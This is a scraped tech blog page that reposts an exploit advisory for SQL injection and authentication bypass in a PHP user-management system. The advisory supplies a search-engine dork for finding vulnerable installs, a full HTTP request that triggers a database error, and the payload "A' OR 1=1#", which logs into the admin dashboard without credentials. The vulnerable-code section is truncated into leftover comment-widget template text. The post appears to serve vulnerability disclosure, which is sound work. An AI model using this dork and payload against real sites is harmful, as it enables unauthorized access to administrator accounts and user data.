• +33 877 554 332
  • info@website.com
PHL Tech Magazine

Post: User Registration & Management System – SQLi (fixed typo)

coder_prem

coder_prem

Hi, I'm Prem. I'm professional WordPress Web Developer. I developed this website. And writing articles about Finance, Startup, Business, Marketing and Tech is my hobby.
Hope you will always get informative articles which will help you to startup your business.
If you need any kind of wordpress website then feel free to contact me at webexpertprem@gmail.com

Categories

Recent Posts


User Registration & Management System – SQLi (fixed typo)

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > User Registration & Management System – SQLi
.:. Google Dorks .:.
inurl:loginsystem/index.php
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy(at)live.no
.:. Vendor -> https://phpgurukul.com/
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS (*nix Darwin Kernel), on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
“User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us.”
===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass
Types: error-based
File: localhost/admin/index.php
Vul Parameter: USERNAME (POST)
POST PoC #1: http://tom:8080/loginsystem/admin/index.php
Host: tom
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://tom
Connection: keep-alive
Referer: http://tom/loginsystem/admin/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1
username=’&password=test&login=
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9
===========================================================================================
Test #2 => Payload to skip authentication
http://localhost:9000/loginsystem/admin/index.php
username=A’ OR 1=1#&password=1&login=
Response:
302 redirect to dashboard.php
===========================================================================================
Vuln File:/loginsystem/admin/index.php
Vul Code:
0)

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1

{{ x.comment }}

The post User Registration & Management System – SQLi (fixed typo) appeared first on DIGITALIVE.WORLD.

Lora Helmin

Lora Helmin

Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Popular Posts

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

Why North Americans Are Staying Put Despite Job Dissatisfaction
Entrepreneurship
Ryan February 22, 2025

Why North Americans Are Staying Put…

SEC, DOJ investigate CrowdStrike deal with reseller Carahsoft – Computerworld
Tech
coder_prem February 22, 2025

SEC, DOJ investigate CrowdStrike deal with…

The 7 Principles of Conversion-Centered Landing Page Design
Marketing
Ryan February 22, 2025

The 7 Principles of Conversion-Centered Landing…

PHL Tech Magazine

“PHL TECH Magazine is your go-to online destination for all things tech. Stay updated with the latest news, trends, and innovations in the world of technology. Explore in-depth articles, interviews, and reviews that delve into the exciting realm of gadgets, software, startups, and more. Join our vibrant community and immerse yourself in the ever-evolving world of tech with PHL TECH Magazine.”

About PHL TECH MAGAZINE

Your one-stop source for startup, business, finance, and tech news. Stay informed with our timely articles on innovation, entrepreneurship, and the latest industry trends.

Recent Posts

Get interesting news

Subscribe to our newsletter and we’ll send you the emails of latest posts.

2023 PHL TECH MAGAZINE. All rights reserved. Designed with CoderPrem.